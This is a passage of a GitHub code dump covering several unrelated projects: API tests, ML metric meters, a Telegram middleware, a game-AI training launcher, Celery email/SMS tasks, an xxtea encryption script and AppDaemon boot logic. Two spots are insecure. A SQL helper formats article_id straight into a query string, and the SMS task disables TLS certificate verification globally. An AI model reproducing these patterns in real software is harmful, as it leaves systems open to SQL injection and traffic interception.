encoded\n","repo_name":"Ziggoto/escalonador-so","sub_path":"core/desenha.py","file_name":"desenha.py","file_ext":"py","file_size_in_byte":5016,"program_lang":"python","lang":"pt","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"30202898914","text":"import pytest\nfrom http import HTTPStatus\nfrom unittest.mock import patch\n\nfrom legal_api.models import Business, RequestTracker, UserRoles\nfrom legal_api.resources.v2 import request_tracker\n\nfrom tests.unit.models import factory_business\nfrom tests.unit.services.utils import create_header\n\n\ndef test_get_bn_request_trackers(session, client, jwt):\n \"\"\"Get all BN request.\"\"\"\n identifier = 'FM0000001'\n business = factory_business(identifier, entity_type=Business.LegalTypes.SOLE_PROP.value)\n\n request_tracker = RequestTracker(\n request_type=RequestTracker.RequestType.INFORM_CRA,\n retry_number=-1,\n service_name=RequestTracker.ServiceName.BN_HUB,\n business_id=business.id,\n request_object=''\n )\n request_tracker.save()\n\n rv = client.get(f'/api/v2/requestTracker/bn/{identifier}',\n headers=create_header(jwt, [UserRoles.bn_edit], identifier))\n\n assert rv.status_code == HTTPStatus.OK\n assert rv.json['requestTrackers'][0]['id'] == request_tracker.id\n assert rv.json['requestTrackers'][0]['requestType'] == request_tracker.request_type.name\n assert rv.json['requestTrackers'][0]['isProcessed'] == request_tracker.is_processed\n assert rv.json['requestTrackers'][0]['serviceName'] == request_tracker.service_name.name\n assert rv.json['requestTrackers'][0]['isAdmin'] == request_tracker.is_admin\n\n\ndef test_get_request_tracker(session, client, jwt):\n \"\"\"Get request tracker.\"\"\"\n identifier = 'FM0000001'\n business = factory_business(identifier, entity_type=Business.LegalTypes.SOLE_PROP.value)\n\n request_tracker = RequestTracker(\n request_type=RequestTracker.RequestType.INFORM_CRA,\n retry_number=-1,\n service_name=RequestTracker.ServiceName.BN_HUB,\n business_id=business.id,\n request_object='',\n response_object=''\n )\n request_tracker.save()\n\n rv = client.get(f'/api/v2/requestTracker/{request_tracker.id}',\n headers=create_header(jwt, [UserRoles.bn_edit], identifier))\n\n assert rv.status_code == HTTPStatus.OK\n assert rv.json['id'] == request_tracker.id\n assert rv.json['requestType'] == request_tracker.request_type.name\n assert rv.json['isProcessed'] == request_tracker.is_processed\n assert rv.json['serviceName'] == request_tracker.service_name.name\n assert rv.json['isAdmin'] == request_tracker.is_admin\n assert rv.json['request'] == request_tracker.request_object\n assert rv.json['response'] == request_tracker.response_object\n\n\n@pytest.mark.parametrize('request_type, request_xml', [\n (RequestTracker.RequestType.INFORM_CRA, ''),\n (RequestTracker.RequestType.CHANGE_DELIVERY_ADDRESS, ''),\n (RequestTracker.RequestType.CHANGE_MAILING_ADDRESS, ''),\n (RequestTracker.RequestType.CHANGE_NAME, ''),\n (RequestTracker.RequestType.CHANGE_PARTY, ''),\n (RequestTracker.RequestType.CHANGE_STATUS, ''),\n])\ndef test_resubmit_bn_request(session, client, jwt, request_type, request_xml):\n \"\"\"Get all BN request.\"\"\"\n identifier = 'FM0000001'\n business = factory_business(identifier, entity_type=Business.LegalTypes.SOLE_PROP.value)\n json_data = {\n 'requestType': request_type.name,\n 'request': request_xml\n }\n with patch.object(request_tracker, 'publish_entity_event'):\n rv = client.post(f'/api/v2/requestTracker/bn/{identifier}',\n headers=create_header(jwt, [UserRoles.bn_edit], 
identifier),\n json=json_data)\n\n assert rv.status_code == HTTPStatus.OK\n\n request_trackers = RequestTracker.find_by(business.id,\n RequestTracker.ServiceName.BN_HUB,\n request_type=request_type)\n assert request_trackers[0].request_object == request_xml\n assert request_trackers[0].is_admin\n assert request_trackers[0].message_id\n","repo_name":"bcgov/lear","sub_path":"legal-api/tests/unit/resources/v2/test_request_tracker.py","file_name":"test_request_tracker.py","file_ext":"py","file_size_in_byte":4338,"program_lang":"python","lang":"en","doc_type":"code","stars":12,"dataset":"github-code","pt":"48"} +{"seq_id":"8921719719","text":"# function with var num of arguments\n# *a represents we are passing multiple arg\n\ndef sum(*a):\n # print(a)\n s = 0\n for x in a:\n s = s+x\n return s\n\nz = sum(10,20,30,40,50)\nprint(z)\nz = sum(10,20,30,40,50,60,70)\nprint(z)\nz = sum(10,20)\nprint(z)\n","repo_name":"KaranKadam1/Python","sub_path":"CLASS PROGRAMS/func11.py","file_name":"func11.py","file_ext":"py","file_size_in_byte":262,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"42535548236","text":"from .test_metrics import dice, iou, SegmentationMetricMode\nimport numpy as np\nfrom enum import Enum\n\nclass SegmentationMetricReductionMode(Enum):\n\n EMPTY_SET_IGNORE_BINARY_NO_BG = \"empty_set_ignore_binary_no_bg\"\n EMPTY_SET_IGNORE_MULTICLASS_NO_BG = \"empty_set_ignore_multiclass_no_bg\"\n NONE = \"none\"\n\nclass PerformanceMeter(object):\n\n def __init__(self, scoring_function):\n self.scoring_function = scoring_function\n\n def get_final_metric(self):\n pass\n\nclass SegmentationMeter(PerformanceMeter):\n\n def __init__(self, n_classes, scoring_function, mode, reduction_mode):\n super(SegmentationMeter, self).__init__(scoring_function=scoring_function)\n self.top = 0\n self.bottom = 0\n self.epsilon = 0.000001\n self.n_classes = n_classes\n self.mode = mode\n self.reduction_mode = reduction_mode\n\n def update(self, prediction, target):\n\n if self.reduction_mode != SegmentationMetricReductionMode.NONE:\n _, t, b = self.scoring_function(prediction, target, num_classes=self.n_classes, segmentation_mode=self.mode)\n else:\n _, t, b, _ = self.scoring_function(prediction, target)\n\n if self.reduction_mode == SegmentationMetricReductionMode.EMPTY_SET_IGNORE_BINARY_NO_BG:\n self.top += t[1] if not np.isnan(b[1:])[0] else 0\n self.bottom += b[1] if not np.isnan(b[1:])[0] else 0\n elif self.reduction_mode == SegmentationMetricReductionMode.EMPTY_SET_IGNORE_MULTICLASS_NO_BG:\n self.top += t[1:][~np.isnan(t[1:])].sum() # don't include first class (bg)\n self.bottom += b[1:][~np.isnan(b[1:])].sum() # don't include first class (bg)\n elif self.reduction_mode == SegmentationMetricReductionMode.NONE:\n self.top += t.item()\n self.bottom += b.item()\n else:\n raise Exception(f'Segmentation metric mode {self.reduction_mode} not implemented yet.')\n\n def get_final_metric(self):\n return self.top / (self.bottom + self.epsilon)\n\nclass DiceMeter(SegmentationMeter):\n\n def __init__(self, n_classes, reduction_mode, mode=SegmentationMetricMode.EMPTY_SET_IGNORE):\n super(DiceMeter, self).__init__(\n n_classes=n_classes,\n scoring_function=dice,\n mode=mode,\n reduction_mode=reduction_mode\n )\n\nclass LegacySegmentationMeter(SegmentationMeter):\n\n def __init__(self, n_classes, scoring_function):\n super(LegacySegmentationMeter, self).__init__(\n n_classes=n_classes,\n scoring_function=scoring_function,\n mode=None,\n 
reduction_mode=SegmentationMetricReductionMode.NONE\n )\n\nclass IoUMeter(SegmentationMeter):\n\n def __init__(self, n_classes, reduction_mode, mode=SegmentationMetricMode.EMPTY_SET_IGNORE):\n super(IoUMeter, self).__init__(\n n_classes=n_classes,\n scoring_function=iou,\n mode=mode,\n reduction_mode=reduction_mode\n )\n","repo_name":"EliasPa/thesis-ssl-ich-segmentation","sub_path":"networks/metrics/meters.py","file_name":"meters.py","file_ext":"py","file_size_in_byte":3006,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"26001234505","text":"import logging\n\nfrom aiogram.dispatcher.middlewares import BaseMiddleware\nfrom aiogram.types import Update\n\n\nclass BigBrother(BaseMiddleware):\n async def on_pre_process_update(self, update: Update, data: dict):\n logging.info(\"[------------------Новый апдейт!------------------]\")\n logging.info(\"1. Pre Process Update\")\n logging.info(\"Следующая точка: Process Update\")\n data[\"middleware_data\"] = \"Это пройдет до on_process_update\"\n\n banned_users = [1234567]","repo_name":"rebos2/telegram_bot","sub_path":"tgbot/middlewares/big_brother.py","file_name":"big_brother.py","file_ext":"py","file_size_in_byte":531,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"7784503326","text":"from database import executor\n\ndef by_article_id(article_id):\n \"\"\"\n Get the title based on article id\n\n Locations: display.display_articles(), rename.rename()\n\n Parameters:\n article_id (int)\n\n Returns:\n title (string)\n \"\"\"\n sql = \"SELECT article_title FROM articles WHERE article_id = {}\".format(article_id)\n c = executor.select(sql)\n return c[0][0]\n\ndef all():\n \"\"\"\n Get all the titles\n\n Returns:\n titles (list): a list of all the titles in the table\n \"\"\"\n titles = []\n sql = \"SELECT article_title, full_number FROM articles\"\n c = executor.select(sql)\n for x in c:\n titles.append((x[0], x[1]))\n return titles\n","repo_name":"unquenchedservant/JETS","sub_path":"database/get_title.py","file_name":"get_title.py","file_ext":"py","file_size_in_byte":680,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"36155658948","text":"import argparse\nfrom datetime import datetime\nimport multiprocessing as mp\nimport os\nimport os.path as osp\nimport sys\nimport tensorflow as tf\n\nimport utils\nfrom trainer import trainer\nfrom train_manager import train_manager\nfrom player import player\nfrom player_manager import player_manager\n\nconfig_proto = tf.ConfigProto()\nconfig_proto.gpu_options.allow_growth = True\ntf.enable_eager_execution(config=config_proto)\n\n\ndef main():\n args = parse_args()\n\n valid_modes_list = utils.get_valid_game_modes()\n valid_modes_string = utils.get_valid_game_modes_string()\n if args.mode not in valid_modes_list:\n print('Invalid game mode informed. 
Please inform a mode with ' +\n '--mode=mode_name, where mode_name is one of the following ' +\n '{%s}' % valid_modes_string)\n sys.exit()\n\n args.gpu_id = [int(x) for x in args.gpu_id]\n\n gconf = utils.get_game_config(args.mode, 'test')\n\n if len(args.gpu_id) == 0:\n player_gpu_ids = [-1 for _ in range(args.num_player_processes)]\n elif len(args.gpu_id) == 1:\n player_gpu_ids = [\n args.gpu_id[0] for _ in range(args.num_player_processes)]\n else:\n # Leave first GPU for training and the others for playing\n gpus_for_players = args.gpu_id[1:]\n player_gpu_ids = []\n num_repetitions = (args.num_player_processes //\n len(gpus_for_players) + 1)\n for _ in range(num_repetitions):\n player_gpu_ids += gpus_for_players\n player_gpu_ids = player_gpu_ids[:args.num_player_processes]\n\n print('Player gpu ids', player_gpu_ids)\n\n if args.game_type == 'moku':\n (game_config_string, game_manager_module, game_manager_kwargs,\n _, _) = \\\n utils.generate_moku_manager_params(\n gconf.drop_mode, gconf.moku_size, gconf.board_size,\n args.gpu_id[0], gconf.num_res_layers, gconf.num_channels)\n else:\n raise NotImplementedError(\n 'Game type %s is not supported.' % args.game_type)\n\n max_ckpts_to_keep = 1\n\n players_game_manager_kwargs = []\n for gpu_id in player_gpu_ids:\n if args.game_type == 'moku':\n (game_config_string, game_manager_module, game_manager_kwargs,\n _, _) = \\\n utils.generate_moku_manager_params(\n gconf.drop_mode, gconf.moku_size, gconf.board_size,\n gpu_id, gconf.num_res_layers, gconf.num_channels)\n else:\n raise NotImplementedError(\n 'Game type %s is not supported.' % args.game_type)\n players_game_manager_kwargs.append(game_manager_kwargs)\n\n train_dir = osp.join('train_files', game_config_string)\n\n os.makedirs(train_dir, exist_ok=True)\n\n ckpt_path = None\n ckpt = tf.train.get_checkpoint_state(train_dir)\n if ckpt and ckpt.model_checkpoint_path:\n ckpt_path = ckpt.model_checkpoint_path\n\n game_manager_kwargs['ckpt_path'] = ckpt_path\n\n trmanager_trainer_queue = mp.Queue(gconf.queue_capacity)\n trainer_trmanager_queue = mp.Queue(1)\n\n print('%s: Starting trainer' % datetime.now().strftime(\n '%Y_%m_%d_%H_%M_%S'))\n\n player_trmanager_queue = mp.Queue(gconf.queue_capacity)\n trmanager_plmanager_queue = mp.Queue(gconf.queue_capacity)\n\n train_manager_p = mp.Process(\n target=train_manager, args=(\n player_trmanager_queue, trmanager_plmanager_queue,\n trainer_trmanager_queue, trmanager_trainer_queue, train_dir,\n gconf.max_samples_per_result_to_train,\n gconf.num_games_per_checkpoint, gconf.train_batch_size,\n gconf.augment_training_samples, gconf.use_relative_value_labels,\n game_config_string, game_manager_module, game_manager_kwargs))\n train_manager_p.daemon = True\n train_manager_p.start()\n\n plmanager_player_queue = mp.Queue(gconf.queue_capacity)\n\n print('%s: Launching players' % datetime.now().strftime(\n '%Y_%m_%d_%H_%M_%S'))\n\n players_p = [mp.Process(\n target=player, args=(\n player_trmanager_queue, plmanager_player_queue,\n train_dir, gconf.max_simulations_per_move,\n gconf.max_seconds_per_move, gconf.move_temperature,\n gconf.num_relaxed_turns, gconf.random_move_probability,\n gconf.cpuct, gconf.virtual_loss, gconf.root_noise_weight,\n gconf.dirichlet_noise_param, gconf.eval_batch_size,\n game_manager_module, players_game_manager_kwargs[i],\n )\n ) for i in range(args.num_player_processes)]\n for p in players_p:\n p.daemon = True\n p.start()\n\n plmanager_fileclient_queue = None\n fileclient_plmanager_queue = None\n player_manager_p = mp.Process(\n 
target=player_manager, args=(\n trmanager_plmanager_queue, plmanager_player_queue,\n plmanager_fileclient_queue, fileclient_plmanager_queue,\n train_dir, max_ckpts_to_keep,))\n player_manager_p.daemon = True\n player_manager_p.start()\n\n trainer(trmanager_trainer_queue, trainer_trmanager_queue,\n train_dir, gconf.train_batch_size, gconf.save_ckpt_interval,\n gconf.max_train_iters, gconf.initial_lr, gconf.lr_decay,\n gconf.lr_decay_steps, gconf.log_interval,\n gconf.backpropagate_losing_policies,\n gconf.keep_checkpoint_every_n_hours, game_config_string,\n game_manager_module, game_manager_kwargs)\n\n\ndef parse_args():\n parser = argparse.ArgumentParser()\n valid_modes = utils.get_valid_game_modes_string()\n parser.add_argument(\n '--mode',\n help=('A valid game mode name. valid modes are {%s}.' % valid_modes),\n default=None\n )\n parser.add_argument(\n '--gpu_id',\n nargs='+',\n help=('List (separated by spaces) of GPU ids to use, or -1 to use ' +\n 'the CPU.'),\n default=['0']\n )\n parser.add_argument(\n '--game_type',\n help=('Type is a more general term which may include many game ' +\n 'modes. For example, moku is the type of tictactoe, connect4 ' +\n 'and gomoku modes.'),\n default='moku'\n )\n parser.add_argument(\n '-n',\n '--num_player_processes',\n help=('Number of parallel player processes to run.'),\n default=3,\n type=int\n )\n args = parser.parse_args()\n return args\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"hmorimitsu/moku-zero","sub_path":"launch_local_train.py","file_name":"launch_local_train.py","file_ext":"py","file_size_in_byte":6452,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"30135215677","text":"\"\"\"\nAUTHOR: zeng_xiao_yu\nGITHUB: https://github.com/zengxiaolou\nEMAIL: zengevent@gmail.com\nTIME: 2020/9/13-17:43\nINSTRUCTIONS: 异步发送邮件\n\"\"\"\nfrom __future__ import absolute_import, unicode_literals\n\nimport logging\nimport ssl\n\nfrom celery import shared_task\nfrom django.core.mail import send_mail\n\nfrom tencentcloud.common import credential\nfrom tencentcloud.common.exception.tencent_cloud_sdk_exception import TencentCloudSDKException\n# 导入 SMS 模块的client models\nfrom tencentcloud.sms.v20190711 import sms_client, models\n\n# 导入可选配置类\nfrom tencentcloud.common.profile.client_profile import ClientProfile\nfrom tencentcloud.common.profile.http_profile import HttpProfile\n\nfrom main.settings import TENCENT_SECRETID, TENCENT_SECRETKEY, TENCENT_SMSSDKAPPID, TENCENT_SIGN, TENCENT_TEMPLATEID\n\nlogger = logging.getLogger('django_log')\n\n\n@shared_task\ndef send_mails(theme: str, code: str, account: str):\n \"\"\"发送邮件\"\"\"\n send_mail(\n theme,\n '您的验证码为\\n ' + code + \"\\n有效期为5分钟\",\n '18328457630@163.com',\n ['18328457630@163.com', account],\n fail_silently=False\n )\n\n\n@shared_task\ndef send_sms(mobile=None, code=None):\n \"\"\"发送短信\"\"\"\n try:\n # 必要步骤:\n # 实例化一个认证对象,入参需要传入腾讯云账户密钥对 secretId 和 secretKey\n # 本示例采用从环境变量读取的方式,需要预先在环境变量中设置这两个值\n # 您也可以直接在代码中写入密钥对,但需谨防泄露,不要将代码复制、上传或者分享给他人\n # CAM 密钥查询:https://console.cloud.tencent.com/cam/capi\n cred = credential.Credential(TENCENT_SECRETID, TENCENT_SECRETKEY)\n ssl._create_default_https_context = ssl._create_unverified_context\n # cred = credential.Credential(\n # os.environ.get(\"\"),\n # os.environ.get(\"\")\n # )\n\n # 实例化一个 http 选项,可选,无特殊需求时可以跳过\n httpProfile = HttpProfile()\n httpProfile.reqMethod = \"POST\" # POST 请求(默认为 POST 请求)\n httpProfile.reqTimeout = 60 # 请求超时时间,单位为秒(默认60秒)\n httpProfile.endpoint = 
\"sms.tencentcloudapi.com\" # 指定接入地域域名(默认就近接入)\n\n # 非必要步骤:\n # 实例化一个客户端配置对象,可以指定超时时间等配置\n clientProfile = ClientProfile()\n clientProfile.signMethod = \"TC3-HMAC-SHA256\" # 指定签名算法\n clientProfile.language = \"en-US\"\n clientProfile.httpProfile = httpProfile\n\n # 实例化 SMS 的 client 对象\n # 第二个参数是地域信息,可以直接填写字符串 ap-guangzhou,或者引用预设的常量\n client = sms_client.SmsClient(cred, \"ap-guangzhou\", clientProfile)\n\n # 实例化一个请求对象,根据调用的接口和实际情况,可以进一步设置请求参数\n # 您可以直接查询 SDK 源码确定 SendSmsRequest 有哪些属性可以设置\n # 属性可能是基本类型,也可能引用了另一个数据结构\n # 推荐使用 IDE 进行开发,可以方便的跳转查阅各个接口和数据结构的文档说明\n req = models.SendSmsRequest()\n\n # 基本类型的设置:\n # SDK 采用的是指针风格指定参数,即使对于基本类型也需要用指针来对参数赋值\n # SDK 提供对基本类型的指针引用封装函数\n # 帮助链接:\n # 短信控制台:https://console.cloud.tencent.com/smsv2\n # sms helper:https://cloud.tencent.com/document/product/382/3773\n\n # 短信应用 ID: 在 [短信控制台] 添加应用后生成的实际 SDKAppID,例如1400006666\n req.SmsSdkAppid = TENCENT_SMSSDKAPPID\n # 短信签名内容: 使用 UTF-8 编码,必须填写已审核通过的签名,可登录 [短信控制台] 查看签名信息\n req.Sign = TENCENT_SIGN\n # 短信码号扩展号: 默认未开通,如需开通请联系 [sms helper]\n req.ExtendCode = \"\"\n # 用户的 session 内容: 可以携带用户侧 ID 等上下文信息,server 会原样返回\n req.SessionContext = \"xxx\"\n # 国际/港澳台短信 senderid: 国内短信填空,默认未开通,如需开通请联系 [sms helper]\n req.SenderId = \"\"\n # 下发手机号码,采用 e.164 标准,+[国家或地区码][手机号]\n # 例如+8613711112222, 其中前面有一个+号 ,86为国家码,13711112222为手机号,最多不要超过200个手机号\n req.PhoneNumberSet = [\"+86\" + mobile]\n # 模板 ID: 必须填写已审核通过的模板 ID,可登录 [短信控制台] 查看模板 ID\n req.TemplateID = TENCENT_TEMPLATEID\n # 模板参数: 若无模板参数,则设置为空\n req.TemplateParamSet = [code]\n\n # 通过 client 对象调用 SendSms 方法发起请求。注意请求方法名与请求对象是对应的\n resp = client.SendSms(req)\n\n # 输出 JSON 格式的字符串回包\n logger.info(resp.to_json_string(indent=2))\n\n except TencentCloudSDKException as err:\n logger.info(err)\n\n","repo_name":"zengxiaolou/blog-back","sub_path":"apis/utils/tasks.py","file_name":"tasks.py","file_ext":"py","file_size_in_byte":5308,"program_lang":"python","lang":"zh","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"32684501846","text":"import sys\nimport os\nimport traceback\nimport glob\nimport string\nimport struct\nimport subprocess\n\n_DELTA = 0x9E3779B9\n\ndef _long2str(v, w):\n n = (len(v) - 1) << 2\n if w:\n m = v[-1]\n if (m < n - 3) or (m > n): return ''\n n = m\n s = struct.pack('<%iL' % len(v), *v)\n return s[0:n] if w else s\n\ndef _str2long(s, w):\n n = len(s)\n m = (4 - (n & 3) & 3) + n\n s = s.ljust(m, \"\\0\")\n v = list(struct.unpack('<%iL' % (m >> 2), s))\n if w: v.append(n)\n return v\n\ndef encrypt(str, key):\n if str == '': return str\n v = _str2long(str, True)\n k = _str2long(key.ljust(16, \"\\0\"), False)\n n = len(v) - 1\n z = v[n]\n y = v[0]\n sum = 0\n q = 6 + 52 // (n + 1)\n while q > 0:\n sum = (sum + _DELTA) & 0xffffffff\n e = sum >> 2 & 3\n for p in xrange(n):\n y = v[p + 1]\n v[p] = (v[p] + ((z >> 5 ^ y << 2) + (y >> 3 ^ z << 4) ^ (sum ^ y) + (k[p & 3 ^ e] ^ z))) & 0xffffffff\n z = v[p]\n y = v[0]\n v[n] = (v[n] + ((z >> 5 ^ y << 2) + (y >> 3 ^ z << 4) ^ (sum ^ y) + (k[n & 3 ^ e] ^ z))) & 0xffffffff\n z = v[n]\n q -= 1\n return _long2str(v, False)\n\ndef _run_cmd(command):\n ret = subprocess.call(command, shell=True)\n if ret != 0:\n message = 'Error running command'\n raise Error(message)\n\ndef main():\n workpath = os.path.dirname(os.path.realpath(__file__))\n outpath = os.path.join(workpath, 'xxtea')\n\n try:\n os.makedirs(outpath)\n except OSError:\n if (os.path.exists(outpath) == False):\n raise Error(\"Error: cannot create folder\" + outpath)\n\n print('=======================================================')\n print('==> Begin to 
xxtea!')\n\n filelist = glob.glob('./*.json')\n for filename in filelist:\n print(os.path.join(outpath, filename))\n newfile = os.path.join(outpath, filename)\n _run_cmd('copy ' + filename + ' ' + newfile)\n bytesFile = open(newfile, \"rb+\")\n encryBytes = encrypt(bytesFile.read(), 'tinygame')\n encryBytes = 'tinygame' + encryBytes\n bytesFile.seek(0)\n bytesFile.write(encryBytes)\n bytesFile.close()\n\n print('==> Completed!')\n\n# -------------- main --------------\nif __name__ == '__main__':\n try:\n main()\n os.system(\"pause\")\n except Exception as e:\n traceback.print_exc()\n sys.exit(1)\n","repo_name":"rangercyh/utils","sub_path":"pack/xxtea.py","file_name":"xxtea.py","file_ext":"py","file_size_in_byte":2397,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"18890208822","text":"import json\nimport time\n\nfrom asgiref.sync import async_to_sync\nfrom channels.layers import get_channel_layer\nfrom django.conf import settings\nfrom django.core.serializers.json import DjangoJSONEncoder\nfrom sentry_sdk import capture_exception\n\n\ndef send_channels_group(\n group_name: str,\n call_type: str,\n content: str,\n action: str,\n retry=settings.WS_MESSAGE_RETRIES,\n):\n \"\"\"\n helper function that sends data to channels groups\n \"\"\"\n try:\n channel_layer = get_channel_layer()\n async_to_sync(channel_layer.group_send)(\n group_name,\n {\n \"type\": call_type,\n \"action\": action,\n \"content\": json.dumps(content, cls=DjangoJSONEncoder),\n },\n )\n except Exception as err:\n if retry > 0:\n time.sleep(settings.WEBSOCKET_RETRY_SLEEP)\n return send_channels_group(\n group_name, call_type, content, action, retry - 1\n )\n capture_exception(err)\n","repo_name":"weni-ai/chats-engine","sub_path":"chats/utils/websockets.py","file_name":"websockets.py","file_ext":"py","file_size_in_byte":1021,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"48"} +{"seq_id":"32107101491","text":"def main() -> str:\n N = int(input())\n\n candidates = dict()\n for _ in range(N):\n name = input()\n v = candidates.get(name) or 0\n candidates[name] = v + 1\n\n ans = None\n max_v = 0\n for k, v in candidates.items():\n if v > max_v:\n ans = k\n max_v = v\n\n return ans\n\n\nif __name__ == '__main__':\n print(main())\n","repo_name":"tiqwab/atcoder","sub_path":"abc231/b/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":375,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"70364647185","text":"\"\"\" Controlling via boot_store - there is loading all boot modules that should be controlled\"\"\"\r\n\"\"\"\r\nexcept Exception as ex:\r\n template = \"An exception of type {0} occurred. 
Arguments:\\n{1!r}\"\r\n message = template.format(type(ex).__name__, ex.args)\r\n self.error(message)\r\n raise ValueError(\"Fatal error in core\")\r\n \r\n\"\"\"\r\n\r\nfrom apd_types import BootStartBase, FutureTask\r\nimport hassapi as hass # type:ignore\r\nfrom functools import wraps\r\nimport decorators as d\r\n\r\nfrom module_register import ModuleClasses\r\nfrom helper_tools import MyHelp as h\r\nfrom helper_types import QueueType\r\nfrom asyncio import Queue\r\n\r\nfrom globals import gv\r\nimport globals as g\r\n\r\n\r\n# Do not put in decorators - it is regarding bootstart only\r\ndef boot_module(func):\r\n \"\"\"Adding to boot_store for controlling, necessary to do that in initialize\r\n\r\n Args:\r\n func ([type]): [description]\r\n\r\n Returns:\r\n [type]: [description]\r\n \"\"\"\r\n\r\n @wraps(func)\r\n def wrapper(hass: hass.Hass):\r\n # Signal that module was loaded by system\r\n module_name = h.module_name(hass)\r\n boot_modules = hass.global_vars.get(gv.BOOT_MODULES)\r\n if boot_modules is None:\r\n boot_modules: dict = {}\r\n hass.global_vars[gv.BOOT_MODULES] = boot_modules\r\n\r\n if boot_modules.get(module_name) is None:\r\n boot_modules.update({module_name: hass.args[\"module\"]})\r\n return func(hass)\r\n\r\n return wrapper\r\n\r\n\r\ndef initialized(func):\r\n \"\"\"Adding to boot_store for controlling, necessary to do that in initialize\r\n\r\n Args:\r\n func ([type]): [description]\r\n\r\n Returns:\r\n [type]: [description]\r\n \"\"\"\r\n\r\n\r\ndef apf_module(func):\r\n @wraps(func)\r\n def wrapper(hass: hass.Hass):\r\n module_name = h.module_name(hass)\r\n\r\n apf_modules = hass.global_vars.get(\"apf_modules\")\r\n if apf_modules is None:\r\n apf_modules: dict = {}\r\n hass.global_vars[\"apf_modules\"] = apf_modules\r\n if apf_modules.get(module_name) is None:\r\n apf_modules.update({module_name: hass.args[\"module\"]})\r\n\r\n apf_modules_init = hass.global_vars.get(gv.APF_MODULES_INIT)\r\n if apf_modules_init is None:\r\n apf_modules_init: dict = {}\r\n hass.global_vars[gv.APF_MODULES_INIT] = apf_modules_init\r\n\r\n if apf_modules_init.get(module_name) is None:\r\n apf_modules_init.update({module_name: hass.args[\"module\"]})\r\n\r\n return func(hass)\r\n\r\n return wrapper\r\n\r\n\r\ndef boot_logger(func):\r\n @wraps(func)\r\n def wrapper(hass: hass.Hass):\r\n try:\r\n log = hass.get_user_log(\"apf_logger\")\r\n except:\r\n log = None\r\n if log is not None:\r\n hass.logger = log\r\n hass.set_log_level(\"INFO\")\r\n hass.set_log_level(\"DEBUG\")\r\n hass.debug = hass.logger.debug\r\n hass.error = hass.logger.error\r\n hass.info = hass.logger.info\r\n hass.warning = hass.logger.warning\r\n return func(hass)\r\n\r\n return wrapper\r\n\r\n\r\ndef boot_logger_off(func):\r\n @wraps(func)\r\n def wrapper(hass: hass.Hass):\r\n try:\r\n log = hass.get_user_log(\"apf_logger\")\r\n except:\r\n log = None\r\n if log is not None:\r\n hass.logger = log\r\n hass.set_log_level(\"INFO\")\r\n hass.debug = hass.logger.debug\r\n hass.error = hass.logger.error\r\n hass.info = hass.logger.info\r\n hass.warning = hass.logger.warning\r\n return func(hass)\r\n\r\n return wrapper\r\n\r\n\r\nclass BootStart(BootStartBase):\r\n @boot_logger\r\n def initialize(self):\r\n super().initialize()\r\n self.info(\"Initialize\")\r\n self.boot_queue: QueueType = None\r\n self.apf_queue = None\r\n # in case of debug to allow only some classes\r\n self.apf_allowed = h.par(self.args, \"apf_allowed\", [])\r\n # self.warning(self.apf_allowed)\r\n d.debug_allowed = h.par(self.args, 
\"debug_allowed\", [])\r\n\r\n self._handler_end = None\r\n self._finished = False\r\n config = self.get_plugin_config()\r\n g.time_zone = h.par(config, \"time_zone\", \"\")\r\n self._main_loop_running = False\r\n self.go_init = True\r\n self._task_future: FutureTask = self.sync_create_task(self._main_loop())\r\n\r\n async def clear(self):\r\n self.debug(\"Clear!\")\r\n while True:\r\n if self.boot_queue is not None:\r\n try:\r\n self.boot_queue.get_nowait()\r\n except:\r\n return\r\n self.boot_queue.task_done()\r\n\r\n # ################################################################################\r\n # Maiun loop\r\n # - waiting till all defined boot_modules are done, only then can go to apf modules\r\n # - waiting to all apf modules\r\n ##############################################################################\r\n async def _main_loop(self):\r\n\r\n self._boot_sequence_finished = False\r\n self.warning(\"Start main loop\")\r\n self.module_classes: ModuleClasses = ModuleClasses(self, \"module_classes\")\r\n self.warning(\"Module classes ok\")\r\n await self.module_classes.check_reload()\r\n self._main_loop_running = True\r\n self.debug(\"-Start main loop\")\r\n while self._main_loop_running:\r\n self.debug(\"Waiting\")\r\n if await self.module_classes.all_boot_registered:\r\n break\r\n await self.sleep(5)\r\n self.module_classes.put_boot_modules()\r\n\r\n self.debug(\"Registered\")\r\n while self._main_loop_running:\r\n if self.module_classes.is_boot_finished:\r\n break\r\n self.debug(f\"Waiting for get\")\r\n module_name = await self.module_classes.boot_queue.get()\r\n self.debug(f\"Boot module_name: {module_name}, starting\")\r\n\r\n await self.run_init_boot_module(module_name)\r\n\r\n # Boot modules done, calling APF\r\n self._boot_sequence_finished = True\r\n\r\n self.debug(\"APF ini\")\r\n try:\r\n while self._main_loop_running:\r\n await self.module_classes.put_apf_modules()\r\n module_name = await self.module_classes.apf_queue.get()\r\n self.debug(f\"APF module_name: {module_name}, running init\")\r\n\r\n # Checking if it is allowed\r\n can_be_called = False\r\n if len(self.apf_allowed) == 0:\r\n can_be_called = True\r\n elif h.in_array(module_name, self.apf_allowed):\r\n can_be_called = True\r\n if can_be_called:\r\n await self.run_init_apf_module(module_name)\r\n else:\r\n self.debug(f\"Not allowed>>>: {module_name}\")\r\n self.module_classes.close_module(module_name)\r\n self.module_classes.apf_queue.task_done()\r\n except Exception as ex:\r\n template = \"An exception of type {0} occurred. Arguments:\\n{1!r}\"\r\n message = template.format(type(ex).__name__, ex.args)\r\n self.error(message)\r\n raise ValueError(\"Fatal error in core\")\r\n\r\n async def run_init_apf_module(self, module_name):\r\n try:\r\n await self.module_classes.run_init(module_name)\r\n except Exception as ex:\r\n self.error(f\"Could not ini: {module_name}\")\r\n template = \"An exception of type {0} occurred. 